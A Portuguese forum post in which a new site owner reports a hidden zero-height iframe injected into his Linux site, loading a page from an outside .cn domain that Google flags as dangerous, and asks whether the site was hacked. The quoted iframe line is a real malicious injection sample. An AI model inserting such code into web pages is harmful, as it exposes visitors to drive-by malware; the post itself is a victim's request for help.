Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
Tenho um site pessoal sobre linux, recém criado ( 5dias ) e hospedado na hostiex. Neste final de semana tive muitas dificuldades para acessar via ftp, via Cpanel e também não consegui acesso não-administrativo via navegador, da forma tradicional.
Depois de tentar várias vezes pelo navegador a página carregou. Percebi uma pequena, discreta e estranha linha logo no topo do site, olhei o código fonte e tinha o
seguinte:
<iframe src="http://alimamamm.cn/sky/ms.htm?vip8" width="100" height="0"></iframe>
Fiz uma pesquisa e o google retorna um aviso sinistro: "este site pode danificar o seu computador!"
Revisei todos os códigos php e xhtml que eu escrevi e não encontrei nenhuma entrada suspeita.
Alguém já viu isso?
Será que meu site foi "invadido" e tem algum script colocando este código na minha página?
Fiquei preocupado se algum usuário poderia pegar um vírus, ou algo parecido acessando a minha página.
Eu já enviei um email pra hostiex reclamando deste código, mas ainda não recebi nenhum retorno.
Valeu pessoal, obrigado.
Carregando comentários...